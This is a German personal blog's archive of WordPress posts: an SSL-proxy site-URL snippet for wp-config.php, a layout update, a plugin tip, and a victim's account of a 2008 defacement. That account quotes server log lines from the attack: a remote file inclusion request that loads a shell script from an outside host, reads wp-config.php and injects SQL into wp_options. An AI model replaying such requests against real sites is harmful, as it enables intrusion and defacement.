Tag Archives: wordpress

WordPress Site URL bei Anfragen über einen SSL-Proxy umschreiben

Posted on by

So, nun habe ich es doch hinbekommen, dass WordPress die Blog-URL bei SSL-Anfragen richtig erkennt. Eigentlich ist es ziemlich einfach. Auch bei neueren WordPress-Versionen kann in der “wp_config.php”  die SiteURL und die Homepage angegeben werden. Wird eine HTTPS-Anfrage über einen Proxy gestellt, schreibt dieser normalerweise seinen Hostnamen in die Header-Zeile “HTTP_X_FORWARDED_HOST”. Diese findet man im Array $_SERVER unter dem Schlüssel “HTTP_X_FORWARDED_HOST”. Ist dieser Wert gleich dem SSL-Proxy des Providers, definiert man die Site-URL über den SSL-Proxy. Andernfalls wird hier die normale Blog-URL definiert.

Hier der Code-Schnipsel aus meiner wp_config.php (ssl-account.com ist die Adresse des SSL-Proxys)

if($_SERVER['HTTP_X_FORWARDED_HOST']=="ssl-account.com")
{
// mit SSL-Proxy
define('WP_SITEURL', 'https://ssl-account.com/anb-networkz.de');
define('WP_HOME', 'https://ssl-account.com/anb-networkz.de');
}
else
{
// Ohne SSL-Proxy
define('WP_SITEURL', 'http://anb-networkz.de');
define('WP_HOME', 'http://anb-networkz.de');
}

Neues Seitenlayout online

Posted on by

Nach einigem hin und her habe ich mich dazu entschlossen WordPress einmal vollkommen neu zu installieren. Diesmal verzichte ich auf eine separate Fotogalerie und einige andere Plugins, die in der Vergangenheit immer wieder zu Problemen geführt haben. Als Design verwende ich „Cutline 3-Column Split 1.1“ von Chris Pearson. Einen Link zu diesem Theme findet ihr in der Fußzeile. Viel Spaß :-)

anb-networkz defaced

Posted on by

Screenshot vom Ergebniss der SQL-InjectionAm 30.05.2008 hat es mein kleines Blog erwischt. Eine Person der XTech Group hat doch tatsächlich per SQL-Injection einige Einträge in der WordPress-Datenbank geändert. Zum Glück habe ich ja Backup’s. Das habe ich gleich als Anlass für ein Upgrade auf die aktuelle WPD Version genutzt. Nunja, eigentlich konnte wordpress nichts für den deface. Die Pseudo-hacker nutzten ein Script eines früheren CMS, um die wpp-config.php auszulesen. Anschließend wurden mit einigen SQL-Query’s diverse Datensätze in der MySQL Datenbank geändert. Unter anderem auch der Blog-title und die Blod-Description. Was soll’s. auch ganz lustig anzuschauen waren die Request-Header in den Logfiles des Webservers. Dort ließ sich der deface quasi Nachstellen. Hier einige Einträge:

GET http://anb-networkz.net/html/modules/contact/main.php?this_module_path
=http%3A%2F%2Fwww.mitsubishimania.de%2Fjs%2F1337c99.txt%3F%3F&act=f&
f=wp-config.php&d=%2Fwww%2Fhtdocs%2Fv100329&"
POST /html/modules/contact/main.php?this_module_path=
http%3A%2F%2Fwww.mitsubishimania.de%2Fjs%2F1337c99.txt%3F%3F&
act=sql&sql_login=*******&sql_passwd=**********&
sql_server=localhost&sql_port=3306&sql_db=***&
sql_tbl_act=insert&sql_tbl=wp_options&sql_tbl_ls=0&
sql_tbl_le=30&sql_tbl_insert_q=+%60option_id%60+%3D+
%272%27+AND+%60blog_id%60+%3D+%270%27+AND+%60option_name%
60+%3D+%27blogname%27+AND+%60option_value%60+%3D+
%27..%3A%3AANB-Networkz%3A%3A..%27+AND+%60autoload%60+
%3D+%27yes%27+

Der Aufrufe wurden von 203.162.2.133 ausgelöst, und nutzten Scripte einer (warscheinlich gehackten) website. Da sich dort ein Forum befindet, werde ich das gleich mal dort Posten.

Ich habe nun nur noch WordPress auf diesem Webspace, alle Kennwörter wurden geändert und eine obligatorische Anzeige gegen unbekannt eingereicht. Mal sehen was passiert :-)

Downloadmonitor für WordPress

Posted on by

Wer schon immer einen Downloadmonitor für WordPress gesucht hat, sollte einmal hier schauen. Das Plugin ist recht einfach gehalten und stellt Downloads wahlweise unter dem dateinamen, dem Titel oder einer ID bereit. Ein Userlevel-management ist leider nicht enthalten, für die meisten aber auch nicht erforderlich. Ich habe einige Plugins ausprobiert und finde dieses am besten. Nur zu empfehlen.